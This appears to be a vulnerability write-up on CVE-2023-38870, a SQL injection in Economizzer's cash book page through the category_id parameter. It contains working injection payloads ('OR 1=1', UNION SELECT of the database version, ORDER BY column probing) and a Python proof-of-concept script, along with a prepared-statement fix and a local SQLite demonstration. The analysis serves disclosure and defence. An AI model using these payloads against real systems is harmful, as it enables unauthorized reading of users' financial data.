CVE-2023-38870 - SQL Injection Vulnerability in Economizzer’s Cash Book (Analysis, Code, Exploit)
---
TL;DR
Economizzer, an open-source personal finance app, contains a serious SQL injection vulnerability in its cash book feature: the category_id parameter is concatenated into a database query without validation or parameterization, letting an attacker alter the query. The flaw affects commit 373088 (April 2023) and v.9-beta1.
If you’re using these versions, upgrade immediately or apply the recommended fix.
What is Economizzer?
Economizzer helps users manage personal finances. It is open-source and valued for its simplicity. The flaw discussed in this post is present in commit 373088 (April 2023) and in v.9-beta1; if you run either, read on.
Vulnerability Overview
CVE ID: CVE-2023-38870
Affected files: /cashbook.php, possibly others
Affected parameter: category_id in requests listing accomplishments by category
CWE: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The vulnerability lets an attacker inject arbitrary SQL through the category_id parameter (GET or POST), because the value reaches the query without being cast or bound.
Where’s the Vulnerable Code?
Let's look at a simplified snippet of the vulnerable pattern (the logic around this commit; not a verbatim copy).
// In cashbook.php (simplified)
$category_id = isset($_GET['category_id']) ? $_GET['category_id'] : '';
// ...
// The raw request value is pasted straight into the SQL string: no cast, no binding
$sql = "SELECT * FROM accomplishments WHERE category_id = $category_id";
// ... execute $sql with mysqli_query() or similar
Exploiting this takes little effort. Suppose an attacker sends the following request (the leading 1 keeps the statement syntactically valid):
https://example.com/cashbook.php?category_id=1 OR 1=1
The query becomes
-- Resulting query
SELECT * FROM accomplishments WHERE category_id = 1 OR 1=1
Because 1=1 is always true, the WHERE clause matches every row, so the entire accomplishments table is returned regardless of category.
Worse, an attacker can use UNION SELECT to read data from other tables, or stacked queries if the DBMS and driver support them (mysqli_query() runs a single statement, but mysqli_multi_query() does not).
Here is a proof-of-concept request that extracts the database version (assuming MySQL). The UNION SELECT must supply exactly as many columns as the original SELECT * (four is assumed here); probe the count first with ORDER BY n, which errors once n exceeds the number of columns.
https://example.com/cashbook.php?category_id=1 UNION SELECT 1,2,@@version,4
This simple Python script demonstrates the vulnerability (the target URL and the four-column assumption are placeholders):
import requests

URL = "http://target-site.com/cashbook.php"
# The leading "1" keeps the original SELECT valid; the UNION must supply
# as many columns as the accomplishments table has (4 assumed here)
payload = "1 UNION SELECT 1,2,@@version,4"
r = requests.get(URL, params={"category_id": payload}, timeout=10)
print(r.text)  # the MySQL version string should appear in the response
Original Reference Links
- GitHub advisory thread
- Original commit diff
- Exploit report (if public)
- NVD Entry
Mitigation
Replace the string-built query with a prepared statement and bind the value as an integer. A bound parameter is sent to the server as data, so it cannot change the structure of the query no matter what it contains.
// Secure version ($mysqli is an existing mysqli connection)
$category_id = isset($_GET['category_id']) ? intval($_GET['category_id']) : 0;
$stmt = $mysqli->prepare("SELECT * FROM accomplishments WHERE category_id = ?");
$stmt->bind_param("i", $category_id);
$stmt->execute();
$result = $stmt->get_result(); // rows for the bound integer only
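The exploitation walk-through above and the prepared-statement fix can be seen side by side in the following added Python example, which is not Economizzer's code and not part of the original post. It models the accomplishments table in an in-memory SQLite database (the columns and rows are constructed for the demo, and sqlite_version() stands in for MySQL's @@version), runs the ORDER BY probe that finds how many columns a UNION payload must match, and contrasts three ways of handling category_id: raw concatenation, binding alone, and cast-then-bind.

```python
"""Added example, not Economizzer's code: an in-memory SQLite model of the
page's vulnerable query beside the parameterized fix. SQLite stands in for
MySQL, sqlite_version() for @@version, and the accomplishments table layout
and rows below are constructed for the demo."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create a throw-away accomplishments table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE accomplishments ("
        "id INTEGER PRIMARY KEY, category_id INTEGER, description TEXT, amount REAL)"
    )
    conn.executemany(
        "INSERT INTO accomplishments VALUES (?, ?, ?, ?)",
        [(1, 1, "groceries", 42.5), (2, 2, "rent", 900.0), (3, 3, "salary", 2500.0)],
    )
    return conn


def vulnerable_query(conn: sqlite3.Connection, category_id: str) -> list:
    """Same pattern as the page's snippet: the raw parameter is pasted into SQL."""
    sql = f"SELECT * FROM accomplishments WHERE category_id = {category_id}"
    return conn.execute(sql).fetchall()


def bound_query(conn: sqlite3.Connection, category_id) -> list:
    """Binding alone: the value travels as data, so it can never alter the query."""
    return conn.execute(
        "SELECT * FROM accomplishments WHERE category_id = ?", (category_id,)
    ).fetchall()


def safe_query(conn: sqlite3.Connection, category_id: str) -> list:
    """The page's fix: cast to int, then bind. int() raises ValueError on junk,
    whereas PHP's intval() would silently turn '1 OR 1=1' into 1."""
    return bound_query(conn, int(category_id))


def find_column_count(conn: sqlite3.Connection, max_cols: int = 20) -> int:
    """Attacker-side probe: ORDER BY n fails once n exceeds the column count,
    which is how many columns a UNION SELECT payload must supply."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_query(conn, f"1 ORDER BY {n}")
        except sqlite3.OperationalError:
            return n - 1
    raise RuntimeError("column count not found within max_cols")


def demo() -> tuple:
    """Exercise every path once and return the observable outcomes."""
    conn = make_db()
    legit = vulnerable_query(conn, "1")            # 1 row, as the app intends
    dumped = vulnerable_query(conn, "1 OR 1=1")    # every row in the table
    cols = find_column_count(conn)                 # 4 for this table
    rows = vulnerable_query(conn, f"1 UNION SELECT 1,2,sqlite_version(),{cols}")
    version_leaked = sqlite3.sqlite_version in [r[2] for r in rows]
    bound = bound_query(conn, "1 OR 1=1")          # []: compared as a literal string
    try:
        safe_query(conn, "1 OR 1=1")
        rejected = False
    except ValueError:
        rejected = True                            # answer with HTTP 400, run no query
    return len(legit), len(dumped), cols, version_leaked, len(bound), rejected


if __name__ == "__main__":
    print(demo())
```

Running the block prints (1, 3, 4, True, 0, True): the concatenated query returns one row for a legitimate id, all three rows for 1 OR 1=1, and leaks the engine version through a four-column UNION, while the bound query treats the same payload as an ordinary string that matches nothing and the cast-then-bind path refuses it outright.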
Conclusion
CVE-2023-38870 is a critical SQL injection bug: exploiting it requires only basic knowledge, and it can expose the whole cash book database.
If you run Economizzer at these versions, patch now and audit your own codebase for the same pattern (request values concatenated into SQL strings).
Stay secure!
*All content here is original. Please do not use for malicious purposes. For educational and defensive security only.*
Timeline
Published on: 09/28/2023 04:15:11 UTC
Last modified on: 10/03/2023 00:10:51 UTC